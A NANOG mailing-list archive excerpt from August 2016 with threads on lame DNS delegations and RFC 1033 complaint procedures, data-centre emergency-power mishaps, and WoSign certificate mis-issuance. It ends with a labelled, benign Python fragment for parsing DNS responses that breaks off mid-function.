That is a wrong >>>> assumption. >>> >>> They have methods. They choose not to use them. See RFC 1033 >>> COMPLAINTS then after that the court system. >>> >>> Mark >> >> Let us review this and compare to your statement? >> >> From RFC 1033: >>> COMPLAINTS >>> >>> These are the suggested steps you should take if you are having >>> problems that you believe are caused by someone else's name server: >>> >>> >>> 1. Complain privately to the responsible person for the domain. You >>> can find their mailing address in the SOA record for the domain. >>> >>> 2. Complain publicly to the responsible person for the domain. >>> >>> 3. Ask the NIC for the administrative person responsible for the >>> domain. Complain. You can also find domain contacts on the NIC in >>> the file NETINFO:DOMAIN-CONTACTS.TXT >>> >>> 4. Complain to the parent domain authorities. >>> >>> 5. Ask the parent authorities to excommunicate the domain. >> >> 1. Doesn?t really apply in a situation where someone has pointed >> an NS record for a domain at your server without warning. There >> is no SOA record from which to retrieve said mailing address. > > If they have pointed a NS record at you there is a SOA record. Either > in the zone or in the delegating zone. Sure, but most likely this isn?t particularly useful? See below. > >> Also doesn?t work very well in cases where the SOA record does >> not contain a valid email address that reaches someone. > > Some do, some don't. There is also whois address, web contact addresses > etc. Sometimes, if you?re lucky, if it all works as intended and the person isn?t using domain privacy? > >> 2. Do we really want NANOG buried in ?Will the >> @#@!@$!@$% who delegated XYZ.COM > NS Records to >> point to >> my servers and please cease and desist?? >> messages? Personally, I vote no. > > Why not. It is a operational message about a misconfiguration. Because NANOG isn?t for solving individual misconfigurations. 
It?s for discussing issues on the internet requiring coordination. This doesn?t require coordination of multiple providers, it?s a simple bug report. It would significantly raise the N in SNR IMHO. Your opinion may differ. I still vote no. > >> 3. The NIC? Please explicate Mr. Andrews what that would mean >> in the modern era. Please cover both the normal case and >> the cases where domain privacy is configured. >> >> 4. This might _MIGHT_ actually work, but I suspect that $REGISTRY >> is unlikely to help much when $REGISTRAR accepted an NS record >> from one of their customers for a domain they registered >> that happens to point to your server. Similarly, I suspect >> $REGISTRAR is going to tell you that they won?t make changes >> without authorization from the domain owner. > > The registrar becomes party to the disruption to your services and > no the contract the registry signed with ICANN does not save them > from being fined by a court further down the process so they should > listen as it is their finanical interests to listen. What disruption? It?s pretty hard to argue that sending back some SERVFAIL responses as a result of a few errant packets on UDP/53 constitutes a significant disruption to service. > Criminal law trumps contract law and deliberate disruption to > services falls under criminal law. It becomes deliberate once they > fail to act on the complaint in a timely manner. Remember we are > dealing with matters of fact here. Published NS records and address > records. Sure, but to get a DA to prosecute for deliberate disruption, one has to be able to prove intent. Mere misconfiguration is not intent. Mere misconfiguration followed by ignoring bug reports becomes a little more grey, but I bet you?re still not likely to get very far without a much larger disruption to your service in the form of time spent than you suffer by simply ignoring it. 
> Add to that there are published proceedures that are not being > followed that they should be aware of. Published procedures don?t have the force of law. They may help you to create a presumption of misconduct or negligence, but that?s about as far as they can go. >> 5. I suspect that success in this effort will likely parallel >> the level of success I would expect in step 4. >> >> So, now that we?ve realized that RFC-1033 is utterly useless in this >> context and badly outdated to boot, let?s review your other suggestion? > > No, it isn't utterly useless. It also shows you have tried to solve > the problem in a civil manner if you take it further. It has a less than 0.001% probability of achieving a useful end result. I consider that within the realm of ?utterly useless?. YMMV. > >> ?? after that [sic] the court system.? >> >> [sic] refers to the missing comma. >> >> So let me see if I understand correctly. >> >> I run a pair of nameservers. Let?s call them ns1.company.com >> and ns2.company.com >> >> Someone registers example.com and points NS records >> in the COM zone at my >> nameservers. >> >> I?m now supposed to seek judicial relief in order to compel them to stop >> doing that? >> >> Small claims doesn?t process claims seeking injunctive relief. I suppose >> I could >> use a $1,500 or even $5,000 small claims case as a way to get their >> attention, >> but that?s kind of an abuse of the process. If I want an injunction, at >> least >> in California, I have to go to Superior court. >> >> Now, first, we have to figure out jursidiction. As a general rule, >> jurisdiction >> goes to the court which is responsible for the locale in which the event >> takes >> place or where the contract was entered into, or the jursidiction set by >> the >> contract. In this case, there?s no contract, so we have to look at where >> the >> event in question occurred. 
The problem is that the law hasn?t really >> caught >> up with technology in this area and depending on who ends up being parties >> to the suit, the definition gets pretty murky at best. Is it the primary >> office of the registry? The registrar? The registrant? The location of the >> nameserver(s) which are erroneously pointed to? (What if they are anycast >> all over the world?) The business address of the operator or owner of >> those >> nameservers? Where, exactly do we file this suit? > > Your lawyer will work that out. OK, so let me make sure I?m understanding you correctly. I?m getting these extra packets I don?t want. They?re probably costing me less than $1/day, but they?re a bit annoying. You now want me to go pay someone $300/hour to sort all of this out, probably against a $5,000 or $10,000 retainer just to start? Will you be financing any of these operations, or, are you just hoping that we?re all dumb enough to bankrupt ourselves in the name of clean DNS? >> The next problem we have is who to sue. Do we sue the domain registrant? >> The >> registrar they used to register the domain name? etc. > > Your lawyer will work that out. See above. >> Yeah, I don?t think there?s enough possibility of any sort of recovery to >> make that worth the effort or expense. > > So you decide to not avail yourself of the process available to you. That > is not the same thing as saying there is no process. I never said there was no process. I said that the existing process was useless. If the procedural argument doesn?t convince you and the economic argument doesn?t sink in, then, you are entitled to your opinion, but I?m willing to bet that a much larger fraction of the community believes that there is nothing to be gained from the process compared to the costs of engaging in it. Owen From owen at delong.com Tue Aug 30 23:43:59 2016 From: owen at delong.com (Owen DeLong) Date: Tue, 30 Aug 2016 16:43:59 -0700 Subject: Cloudflare reverse DNS SERVFAIL, normal? 
In-Reply-To: <8738.1472597403@turing-police.cc.vt.edu> References: <20160829212843.53C1252BB76F@rock.dv.isc.org> <20160829234737.GA16137@cmadams.net> <20160830000141.56CE952C6CF0@rock.dv.isc.org> <926F8B85-8864-4424-BEAA-1836B718A9FD@delong.com> <8738.1472597403@turing-police.cc.vt.edu> Message-ID: <2171203D-A70B-415D-B0A5-192591DF0575@delong.com> > On Aug 30, 2016, at 15:50 , Valdis.Kletnieks at vt.edu wrote: > > On Tue, 30 Aug 2016 14:39:10 -0700, Owen DeLong said: > >> I run a pair of nameservers. Let?s call them ns1.company.com >> and ns2.company.com > >> Someone registers example.com and points NS records in the COM zone at my >> nameservers. > > I would have expected that the resulting NXDOMAIN replies from ns1 and ns2 > would usually make this a self-correcting problem. You don?t get NXDOMAIN when a nameserver gets a request for a zone it doesn?t serve. You either get SERVFAIL or you get NS records back as a referral. > Are there actually people who do this misconfiguration on a zone big enough > for the traffic to matter, and leave it that way for very long before they > clue in that things aren't working right? I'd think that if somebody points > billy-bobs-bait-tackle-and-internet.com at you, it might take you quite some > time to notice - and if somebody whoopsies and points ebay.com's NS records > at you, the resulting disfunction would be noticed fairly soon?. Depends on your definition of ?matter?. Also, misconfiguring one important zone doesn?t necessarily generate significantly more traffic than generating a whole lot of unimportant ones. Especially if you misconfigure zones in ip6.arpa or in-addr.arpa as was the case at the beginning of this topic. > (Miscreants who do this intentionally are, of course, a totally different > kettle of fish, and need to be dealt with as micreants....) Yep, though one has to wonder why they would bother. 
Owen From marka at isc.org Wed Aug 31 00:12:13 2016 From: marka at isc.org (Mark Andrews) Date: Wed, 31 Aug 2016 10:12:13 +1000 Subject: Cloudflare reverse DNS SERVFAIL, normal? In-Reply-To: Your message of "Tue, 30 Aug 2016 16:41:25 -0700." <46671DC5-3138-4E7A-A5AF-631B98FE354A@delong.com> References: <20160829212843.53C1252BB76F@rock.dv.isc.org> <20160829234737.GA16137@cmadams.net> <20160830000141.56CE952C6CF0@rock.dv.isc.org> <926F8B85-8864-4424-BEAA-1836B718A9FD@delong.com> <20160830220247.B429652F1A39@rock.dv.isc.org> <46671DC5-3138-4E7A-A5AF-631B98FE354A@delong.com> Message-ID: <20160831001213.E2BC052F4E26@rock.dv.isc.org> In message <46671DC5-3138-4E7A-A5AF-631B98FE354A at delong.com>, Owen DeLong writes: > > > On Aug 30, 2016, at 15:02 , Mark Andrews wrote: > > > > > > In message <926F8B85-8864-4424-BEAA-1836B718A9FD at delong.com > >, Owen DeLong > writes: > >>> On Aug 29, 2016, at 17:01 , Mark Andrews wrote: > >>> > >>> > >>> In message <20160829234737.GA16137 at cmadams.net>, Chris Adams writes: > >>>> Once upon a time, Mark Andrews said: > >>>>> The following is general and is not directed at Cloudflare. I know > >>>>> some people don't think errors in the reverse DNS are not critical > >>>>> but if you are delegated a zone it is your responsibility to ensure > >>>>> your servers are correctly serving that zone regardless of where > >>>>> it is in the DNS hierarchy. Failure to do that causes additional > >>>>> work for recursive servers. If you don't want to serve a zone then > >>>>> remove the delegation. > >>>> > >>>> You are assuming that an authoritative server operator has some way > to > >>>> know all the zones people delegate to their servers, and remove such > >>>> delegations if they don't want to handle them. That is a wrong > >>>> assumption. > >>> > >>> They have methods. They choose not to use them. See RFC 1033 > >>> COMPLAINTS then after that the court system. > >>> > >>> Mark > >> > >> Let us review this and compare to your statement...
> >> > >> From RFC 1033: > >>> COMPLAINTS > >>> > >>> These are the suggested steps you should take if you are having > >>> problems that you believe are caused by someone else's name server: > >>> > >>> > >>> 1. Complain privately to the responsible person for the domain. > You > >>> can find their mailing address in the SOA record for the domain. > >>> > >>> 2. Complain publicly to the responsible person for the domain. > >>> > >>> 3. Ask the NIC for the administrative person responsible for the > >>> domain. Complain. You can also find domain contacts on the NIC in > >>> the file NETINFO:DOMAIN-CONTACTS.TXT > >>> > >>> 4. Complain to the parent domain authorities. > >>> > >>> 5. Ask the parent authorities to excommunicate the domain. > >> > >> 1. Doesn't really apply in a situation where someone has pointed > >> an NS record for a domain at your server without warning. There > >> is no SOA record from which to retrieve said mailing address. > > > > If they have pointed a NS record at you there is a SOA record. Either > > in the zone or in the delegating zone. > > Sure, but most likely this isn't particularly useful... See below. > > > > >> Also doesn't work very well in cases where the SOA record does > >> not contain a valid email address that reaches someone. > > > > Some do, some don't. There is also whois address, web contact addresses > > etc. > > Sometimes, if you're lucky, if it all works as intended and the person > isn't using domain privacy... Domain privacy is supposed to pass on operational and legal issues. It isn't a get out of free card for not running a nameserver / zone correctly. > >> 2. Do we really want NANOG buried in "Will the > >> @#@!@$!@$% who delegated XYZ.COM > > NS Records to > >> point to > >> my servers and please cease and desist?" > >> messages? Personally, I vote no. > > > > Why not. It is a operational message about a misconfiguration. > > Because NANOG isn't for solving individual misconfigurations.
It's for > discussing issues on the internet requiring coordination. > > This doesn't require coordination of multiple providers, it's a simple > bug report. > > It would significantly raise the N in SNR IMHO. Your opinion may differ. > > I still vote no. > > >> 3. The NIC? Please explicate Mr. Andrews what that would mean > >> in the modern era. Please cover both the normal case and > >> the cases where domain privacy is configured. > >> > >> 4. This might _MIGHT_ actually work, but I suspect that $REGISTRY > >> is unlikely to help much when $REGISTRAR accepted an NS record > >> from one of their customers for a domain they registered > >> that happens to point to your server. Similarly, I suspect > >> $REGISTRAR is going to tell you that they won't make changes > >> without authorization from the domain owner. > > > > The registrar becomes party to the disruption to your services and > > no the contract the registry signed with ICANN does not save them > > from being fined by a court further down the process so they should > > listen as it is their financial interests to listen. > > What disruption? It's pretty hard to argue that sending back some > SERVFAIL responses as a result of a few errant packets on UDP/53 > constitutes a significant disruption to service. Owen you have zero knowledge of the volume or impact a configuration error causes. Some are minor, some are not. > > Criminal law trumps contract law and deliberate disruption to > > services falls under criminal law. It becomes deliberate once they > > fail to act on the complaint in a timely manner. Remember we are > > dealing with matters of fact here. Published NS records and address > > records. > > Sure, but to get a DA to prosecute for deliberate disruption, one has > to be able to prove intent. Mere misconfiguration is not intent.
> Mere misconfiguration followed by ignoring bug reports becomes a little > more grey, but I bet you're still not likely to get very far without > a much larger disruption to your service in the form of time spent > than you suffer by simply ignoring it. I suspect ignoring a certified letter complaining about the problem with easily verifiable facts leads to easily provable intent. > > Add to that there are published procedures that are not being > > followed that they should be aware of. > > Published procedures don't have the force of law. They may help you > to create a presumption of misconduct or negligence, but that's about > as far as they can go. I agree they don't have the force of law but courts do pay attention to them especially when one of the parties involved has tried to follow them to avoid going to the courts in the first place. > >> 5. I suspect that success in this effort will likely parallel > >> the level of success I would expect in step 4. > >> > >> So, now that we've realized that RFC-1033 is utterly useless in this > >> context and badly outdated to boot, let's review your other suggestion... > > > > No, it isn't utterly useless. It also shows you have tried to solve > > the problem in a civil manner if you take it further. > > It has a less than 0.001% probability of achieving a useful end result. A made up statistic. I've had better success with errors at stage 1 than that, probably about 20% and no I don't have the records to prove it. > I consider that within the realm of "utterly useless". YMMV. > > >> "... after that [sic] the court system." > >> > >> [sic] refers to the missing comma. > >> > >> So let me see if I understand correctly. > >> > >> I run a pair of nameservers. Let's call them ns1.company.com > >> and ns2.company.com > >> > >> Someone registers example.com and points NS > records > >> in the COM zone at my > >> nameservers.
> >> > >> I'm now supposed to seek judicial relief in order to compel them to > stop > >> doing that? > >> > >> Small claims doesn't process claims seeking injunctive relief. I > suppose > >> I could > >> use a $1,500 or even $5,000 small claims case as a way to get their > >> attention, > >> but that's kind of an abuse of the process. If I want an injunction, at > >> least > >> in California, I have to go to Superior court. > >> > >> Now, first, we have to figure out jurisdiction. As a general rule, > >> jurisdiction > >> goes to the court which is responsible for the locale in which the > event > >> takes > >> place or where the contract was entered into, or the jurisdiction set > by > >> the > >> contract. In this case, there's no contract, so we have to look at > where > >> the > >> event in question occurred. The problem is that the law hasn't really > >> caught > >> up with technology in this area and depending on who ends up being > parties > >> to the suit, the definition gets pretty murky at best. Is it the > primary > >> office of the registry? The registrar? The registrant? The location of > the > >> nameserver(s) which are erroneously pointed to? (What if they are > anycast > >> all over the world?) The business address of the operator or owner of > >> those > >> nameservers? Where, exactly do we file this suit? > > > > Your lawyer will work that out. > > OK, so let me make sure I'm understanding you correctly. > > I'm getting these extra packets I don't want. They're probably costing me > less than $1/day, but they're a bit annoying. > > You now want me to go pay someone $300/hour to sort all of this out, > probably > against a $5,000 or $10,000 retainer just to start? > > Will you be financing any of these operations, or, are you just hoping > that > we're all dumb enough to bankrupt ourselves in the name of clean DNS? > > >> The next problem we have is who to sue. Do we sue the domain > registrant?
> >> The > >> registrar they used to register the domain name? etc. > > > > Your lawyer will work that out. > > See above. > > >> Yeah, I don't think there's enough possibility of any sort of recovery > to > >> make that worth the effort or expense. > > > > So you decide to not avail yourself of the process available to you. > That > > is not the same thing as saying there is no process. > > I never said there was no process. I said that the existing process was > useless. > > If the procedural argument doesn't convince you and the economic argument > doesn't > sink in, then, you are entitled to your opinion, but I'm willing to bet > that a > much larger fraction of the community believes that there is nothing to > be gained > from the process compared to the costs of engaging in it. > > Owen -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From larrysheldon at cox.net Wed Aug 31 00:52:40 2016 From: larrysheldon at cox.net (Larry Sheldon) Date: Tue, 30 Aug 2016 19:52:40 -0500 Subject: Don't press the big red buttom on the wall! In-Reply-To: References: <20160830142110.GA792@sizone.org> Message-ID: <04cdb57b-87b7-67ff-10e0-286fb8a41654@cox.net> On 8/30/2016 09:40, Keith Stokes wrote: > At one point in one data center I dealt with a disgruntled employee > hit the UPS disconnect button on the way out. > > Same story, procedures modified, cover put over switch with a hammer > to break the glass, lessons learned, accounts credited. A very long time ago ("network" involved a fleet of green "wide-band" trucks, hauling tapes to contractors and other offices) the system involved 9 computer centers around the state, built over a period of years, so they had a lot of similarities but some key differences. Many of them had wide, pneumatic sliding doors between the computer room and the unit-record rooms.
Some of the doors had floor mats that would pop the doors open when stepped on (or a cart full of card trays was rolled onto). Many of them (for what ever reason--I think I know but it isn't relevant here) had large black buttons on each side of the doors, on each side of the wall. It happened that one had the mats at the sliding doors. but there was an ordinary door near the consoles that had a large black button next to it. It was in this office that a conversion team was running some stuff that ran for hours (in violation of the rule that if a job ran more than thirty minutes it Must Include checkpoint-restart points every 20 minutes) was nearly finished after running all day and all night (as I recall it). One of the team left the computer room via the ordinary door, pushing the big black button. Which was (you saw this coming a long time ago, right?) the Emergency Power Off button. I do not recall any lessons being learned. At all. The group leader (that refused to include checkpoint-restart) years later was conducting a conversion run in a different system but that had many of the same standards ran a job that ran many many hours in a computer center known for flaky power. Without Checkpoint-Restart. We took a power hit when the run had something like 24 records left to process. -- "Everybody is a genius. But if you judge a fish by its ability to climb a tree, it will live its whole life believing that it is stupid." --Albert Einstein From Larry's Cox account. From larrysheldon at cox.net Wed Aug 31 01:01:59 2016 From: larrysheldon at cox.net (Larry Sheldon) Date: Tue, 30 Aug 2016 20:01:59 -0500 Subject: Don't press the big red buttom on the wall! 
In-Reply-To: <22469.61633.450785.508783@gargle.gargle.HOWL> References: <20160830142110.GA792@sizone.org> <22469.61633.450785.508783@gargle.gargle.HOWL> Message-ID: On 8/30/2016 15:46, bzs at theworld.com wrote: > > About the worst that ever happened to me was a security guy's > walkie-talkie setting off an instant Halon drop. Cost about $10,000 to > refill and was fairly exciting for those present. That also cut the > machine room's power. > > At least it didn't set off the sprinkler system. > > We sat down with the Halon system vendor to find out why that happened > after proving, on a by-passed system, that yes indeed one of these > common walkie-talkies sets the thing off. > > File under: More Things To Worry About! We used to have to drive across a quarry to get to a repeater station (or to one of the cables, which was "aerial" across the quarry), and lots of folks scoffed at the "turn off two-way radios" signs as we approached the area. I did not scoff. -- "Everybody is a genius. But if you judge a fish by its ability to climb a tree, it will live its whole life believing that it is stupid." --Albert Einstein From Larry's Cox account. From marka at isc.org Wed Aug 31 01:09:07 2016 From: marka at isc.org (Mark Andrews) Date: Wed, 31 Aug 2016 11:09:07 +1000 Subject: Don't press the big red buttom on the wall! In-Reply-To: Your message of "Tue, 30 Aug 2016 19:52:40 -0500." <04cdb57b-87b7-67ff-10e0-286fb8a41654@cox.net> References: <20160830142110.GA792@sizone.org> <04cdb57b-87b7-67ff-10e0-286fb8a41654@cox.net> Message-ID: <20160831010907.A0E9052F5A72@rock.dv.isc.org> Back when there were external disk drives with disc packs my boss said "what does this switch do?" then flipped it. The next thing that happened was the paper console started printing as the mounted disc drive had just been powered off on the VAX 750. oops. We all had an unscheduled lunch as the system rebooted and the filesystems were checked.
Mark -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From bzs at theworld.com Wed Aug 31 03:52:24 2016 From: bzs at theworld.com (bzs at theworld.com) Date: Tue, 30 Aug 2016 23:52:24 -0400 Subject: Don't press the big red buttom on the wall! In-Reply-To: References: <20160830142110.GA792@sizone.org> <22469.61633.450785.508783@gargle.gargle.HOWL> Message-ID: <22470.21624.649090.30215@gargle.gargle.HOWL> On August 30, 2016 at 16:26 eric.kuhnke at gmail.com (Eric Kuhnke) wrote: > Does this mean you could drive around with a (illegal, but not difficult to > build or obtain) 20W wide band VHF/UHF jammer radio fed into a 1 meter > parabolic dish, aim it at random buildings and set off peoples' halon > systems? Wow. I'd like to think it's been fixed. Then again there are those Blasting Zones one goes thru on highways with big signs ordering drivers: NO CELLPHONE USE! BLASTING ZONE! Sounds like a good plan. > On Tue, Aug 30, 2016 at 1:46 PM, wrote: > > > > > About the worst that ever happened to me was a security guy's > > walkie-talkie setting off an instant Halon drop. Cost about $10,000 to > > refill and was fairly exciting for those present. That also cut the > > machine room's power. > > > > At least it didn't set off the sprinkler system. > > > > We sat down with the Halon system vendor to find out why that happened > > after proving, on a by-passed system, that yes indeed one of these > > common walkie-talkies sets the thing off. > > > > File under: More Things To Worry About!
> > > > -- > > -Barry Shein > > > > Software Tool & Die | bzs at TheWorld.com | > > http://www.TheWorld.com > > Purveyors to the Trade | Voice: +1 617-STD-WRLD | 800-THE-WRLD > > The World: Since 1989 | A Public Information Utility | *oo* > > -- -Barry Shein Software Tool & Die | bzs at TheWorld.com | http://www.TheWorld.com Purveyors to the Trade | Voice: +1 617-STD-WRLD | 800-THE-WRLD The World: Since 1989 | A Public Information Utility | *oo* From bzs at theworld.com Wed Aug 31 04:06:13 2016 From: bzs at theworld.com (bzs at theworld.com) Date: Wed, 31 Aug 2016 00:06:13 -0400 Subject: Don't press the big red buttom on the wall! In-Reply-To: <20160831010907.A0E9052F5A72@rock.dv.isc.org> References: <20160830142110.GA792@sizone.org> <04cdb57b-87b7-67ff-10e0-286fb8a41654@cox.net> <20160831010907.A0E9052F5A72@rock.dv.isc.org> Message-ID: <22470.22453.425855.934941@gargle.gargle.HOWL> One day, when I ran the Harvard Chemistry computing facility, I was greeted on my way in by panicked profs and grad students that the big VMS VAX (8MB! two memory cabinets! we gave tours!) was behaving strangely, I forget what, probably crawling. A lot of its use was for long-running jobs, week plus, basically inverting matrices. So I leapt into action, whipped off my heavy winter coat and tossed it onto one of the big disk drives and wham the system just halted. Static I guess. Came back ok. Problem solved.
-- -Barry Shein Software Tool & Die | bzs at TheWorld.com | http://www.TheWorld.com Purveyors to the Trade | Voice: +1 617-STD-WRLD | 800-THE-WRLD The World: Since 1989 | A Public Information Utility | *oo* From eric.kuhnke at gmail.com Wed Aug 31 04:38:55 2016 From: eric.kuhnke at gmail.com (Eric Kuhnke) Date: Tue, 30 Aug 2016 21:38:55 -0700 Subject: Chinese root CA issues rogue/fake certificates Message-ID: http://www.percya.com/2016/08/chinese-ca-wosign-faces-revocation.html One of the largest Chinese root certificate authority WoSign issued many fake certificates due to an vulnerability. WoSign's free certificate service allowed its users to get a certificate for the base domain if they were able to prove control of a subdomain. This means that if you can control a subdomain of a major website, say percy.github.io, you're able to obtain a certificate by WoSign for github.io, taking control over the entire domain. From royce at techsolvency.com Wed Aug 31 05:11:52 2016 From: royce at techsolvency.com (Royce Williams) Date: Tue, 30 Aug 2016 21:11:52 -0800 Subject: Chinese root CA issues rogue/fake certificates In-Reply-To: References: Message-ID: On Tue, Aug 30, 2016 at 8:38 PM, Eric Kuhnke wrote: > > http://www.percya.com/2016/08/chinese-ca-wosign-faces-revocation.html > > One of the largest Chinese root certificate authority WoSign issued many > fake certificates due to an vulnerability. WoSign's free certificate > service allowed its users to get a certificate for the base domain if they > were able to prove control of a subdomain. This means that if you can > control a subdomain of a major website, say percy.github.io, you're able to > obtain a certificate by WoSign for github.io, taking control over the > entire domain. And there is now strong circumstantial evidence that WoSign now owns - or at least, directly controls - StartCom: https://www.letsphish.org/?part=about There are mixed signals of incompetence and deliberate action here. 
Royce From eric.kuhnke at gmail.com Wed Aug 31 06:02:16 2016 From: eric.kuhnke at gmail.com (Eric Kuhnke) Date: Tue, 30 Aug 2016 23:02:16 -0700 Subject: Chinese root CA issues rogue/fake certificates In-Reply-To: References: Message-ID: mozilla.dev.security thread: https://groups.google.com/forum/m/#!topic/mozilla.dev.security.policy/k9PBmyLCi8I/discussion On Aug 30, 2016 10:12 PM, "Royce Williams" wrote: > On Tue, Aug 30, 2016 at 8:38 PM, Eric Kuhnke > wrote: > > > > http://www.percya.com/2016/08/chinese-ca-wosign-faces-revocation.html > > > > One of the largest Chinese root certificate authority WoSign issued many > > fake certificates due to an vulnerability. WoSign's free certificate > > service allowed its users to get a certificate for the base domain if > they > > were able to prove control of a subdomain. This means that if you can > > control a subdomain of a major website, say percy.github.io, you're > able to > > obtain a certificate by WoSign for github.io, taking control over the > > entire domain. > > > And there is now strong circumstantial evidence that WoSign now owns - > or at least, directly controls - StartCom: > > https://www.letsphish.org/?part=about > > There are mixed signals of incompetence and deliberate action here. > > Royce > From mel at beckman.org Wed Aug 31 06:50:12 2016 From: mel at beckman.org (Mel Beckman) Date: Wed, 31 Aug 2016 06:50:12 +0000 Subject: Chinese root CA issues rogue/fake certificates In-Reply-To: References: , Message-ID: <31C4C9C4-B9EE-4AB5-8C0B-AA1EDA600750@beckman.org> We've received several unsolicited certificate approval requests from wosign sign on high-value domain names we manage. Wosign has never responded to our requests for information about the requesters. There really isn't anything we can do other than ignore the requests, but clearly somebody is pushing buttons to try to take over these domains or operate MITM attacks. 
-mel beckman > On Aug 30, 2016, at 11:03 PM, Eric Kuhnke wrote: > > mozilla.dev.security thread: > > https://groups.google.com/forum/m/#!topic/mozilla.dev.security.policy/k9PBmyLCi8I/discussion > > >> On Aug 30, 2016 10:12 PM, "Royce Williams" wrote: >> >> On Tue, Aug 30, 2016 at 8:38 PM, Eric Kuhnke >> wrote: >>> >>> http://www.percya.com/2016/08/chinese-ca-wosign-faces-revocation.html >>> >>> One of the largest Chinese root certificate authority WoSign issued many >>> fake certificates due to an vulnerability. WoSign's free certificate >>> service allowed its users to get a certificate for the base domain if >> they >>> were able to prove control of a subdomain. This means that if you can >>> control a subdomain of a major website, say percy.github.io, you're >> able to >>> obtain a certificate by WoSign for github.io, taking control over the >>> entire domain. >> >> >> And there is now strong circumstantial evidence that WoSign now owns - >> or at least, directly controls - StartCom: >> >> https://www.letsphish.org/?part=about >> >> There are mixed signals of incompetence and deliberate action here. >> >> Royce >> From admin at webhosting.net Tue Aug 30 13:22:43 2016 From: admin at webhosting.net (Webhosting.net Admin) Date: Tue, 30 Aug 2016 13:22:43 +0000 Subject: Need abuse/postmaster contact for AT&T to resolve IP block Message-ID: <0CA97089-F458-4AD2-9910-5E12474852B0@webhosting.net> A few of our exchange IPs get blocked intermittently, but only by ATT. Ips are clean, no issues, we're diligent about finding and fixing these types of issues as it has a large impact. It would be very helpful to know why the IP below got blocked so we can find and fix the problem to prevent further listing. We have a few ips in rotation and some have no issue. It's a "blind" listing, so we only find out about it when customers complain that they getting blocked.
ff-ip4-mx-vip1.prodigy.net #_is_blocked.__For_information_see_http://att.net/blocks> #SMTP# Any info/help would be most helpful. Many thanks, Webhosting.net Postmaster From lorenzo.mainardi at digitelitalia.com Tue Aug 30 15:43:46 2016 From: lorenzo.mainardi at digitelitalia.com (Lorenzo Mainardi) Date: Tue, 30 Aug 2016 15:43:46 +0000 Subject: IPv4 Broker Message-ID: Do you know any good IPv4 broker? I need a /20. Regards From nanog at nigelj.net Wed Aug 31 00:23:26 2016 From: nanog at nigelj.net (Nigel Jones) Date: Wed, 31 Aug 2016 12:23:26 +1200 Subject: Cloudflare reverse DNS SERVFAIL, normal? In-Reply-To: <8738.1472597403@turing-police.cc.vt.edu> References: <20160829212843.53C1252BB76F@rock.dv.isc.org> <20160829234737.GA16137@cmadams.net> <20160830000141.56CE952C6CF0@rock.dv.isc.org> <926F8B85-8864-4424-BEAA-1836B718A9FD@delong.com> <8738.1472597403@turing-police.cc.vt.edu> Message-ID: <20160831002326.GE2696@torea.jnet.net.nz> On Tue, Aug 30, 2016 at 06:50:03PM -0400, Valdis.Kletnieks at vt.edu wrote: > On Tue, 30 Aug 2016 14:39:10 -0700, Owen DeLong said: > > > I run a pair of nameservers. Let's call them ns1.company.com > > and ns2.company.com > > > Someone registers example.com and points NS records in the COM zone at my > > nameservers. > > I would have expected that the resulting NXDOMAIN replies from ns1 and ns2 > would usually make this a self-correcting problem. > > Are there actually people who do this misconfiguration on a zone big enough > for the traffic to matter, and leave it that way for very long before they > clue in that things aren't working right? I'd think that if somebody points > billy-bobs-bait-tackle-and-internet.com at you, it might take you quite some > time to notice - and if somebody whoopsies and points ebay.com's NS records > at you, the resulting dysfunction would be noticed fairly soon.... The recent example seems to be Digital Ocean who had 20k domains pointed at their NS servers that weren't configured by customers.
There is a bit about it at https://thehackerblog.com/floating-domains-taking-over-20k-digitalocean-domains-via-a-lax-domain-import-system/index.html that may be interesting to read. I disagree with some of the analysis but it's a reasonable insight into the frequency of this. > > (Miscreants who do this intentionally are, of course, a totally different > kettle of fish, and need to be dealt with as miscreants....) From cb.list6 at gmail.com Wed Aug 31 13:04:21 2016 From: cb.list6 at gmail.com (Ca By) Date: Wed, 31 Aug 2016 06:04:21 -0700 Subject: IPv4 Broker In-Reply-To: References: Message-ID: Check the archive, this issue has been covered Also, if you need a ddos scrubber that will fail when your uplink is saturated, that info is in the archives too On Tuesday, August 30, 2016, Lorenzo Mainardi < lorenzo.mainardi at digitelitalia.com> wrote: > Do you know any good IPv4 broker? > I need a /20. > Regards > > > > From niels=nanog at bakker.net Wed Aug 31 14:18:27 2016 From: niels=nanog at bakker.net (Niels Bakker) Date: Wed, 31 Aug 2016 16:18:27 +0200 Subject: Cloudflare reverse DNS SERVFAIL, normal? In-Reply-To: <2171203D-A70B-415D-B0A5-192591DF0575@delong.com> References: <20160829212843.53C1252BB76F@rock.dv.isc.org> <20160829234737.GA16137@cmadams.net> <20160830000141.56CE952C6CF0@rock.dv.isc.org> <926F8B85-8864-4424-BEAA-1836B718A9FD@delong.com> <8738.1472597403@turing-police.cc.vt.edu> <2171203D-A70B-415D-B0A5-192591DF0575@delong.com> Message-ID: <20160831141827.GG3955@excession.tpb.net> * owen at delong.com (Owen DeLong) [Wed 31 Aug 2016, 01:47 CEST]: >You don't get NXDOMAIN when a nameserver gets a request for a zone >it doesn't serve. Correct in most cases (there's an edge case where a server is [mis] configured as authoritative with its own empty . and its regular zones and allows global querying; it's similar to asking a root server for anything in a nonexistent TLD). >You either get SERVFAIL or you get NS records back as a referral. Or REFUSED. -- Niels.
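Added example, not part of any list message: the reply types named in the messages above (SERVFAIL, a referral, REFUSED, and the authoritative-NXDOMAIN edge case), as a delegation audit would see them when it sends a non-recursive SOA query for the zone apex to each listed nameserver. The nameserver names, the packets and the `audit` helper are constructed for illustration; a real check would take the reply bytes from the network.

```python
import struct

TYPE_NS, TYPE_SOA, CLASS_IN = 2, 6, 1
RCODE_NAMES = {0: "NOERROR", 2: "SERVFAIL", 3: "NXDOMAIN", 5: "REFUSED"}


def encode_name(name):
    """Encode a domain name in uncompressed DNS wire format."""
    labels = [l for l in name.rstrip(".").split(".") if l]
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def skip_name(msg, off):
    """Return the offset just past the (possibly compressed) name at off."""
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:      # compression pointer: two bytes, ends the name
            return off + 2
        off += 1
        if length == 0:                # root label terminates the name
            return off
        off += length


def parse_response(msg):
    """Extract header bits and the record types in the answer/authority sections."""
    if len(msg) < 12:
        raise ValueError("truncated DNS header")
    _id, flags, qd, an, ns, _ar = struct.unpack("!6H", msg[:12])
    off = 12
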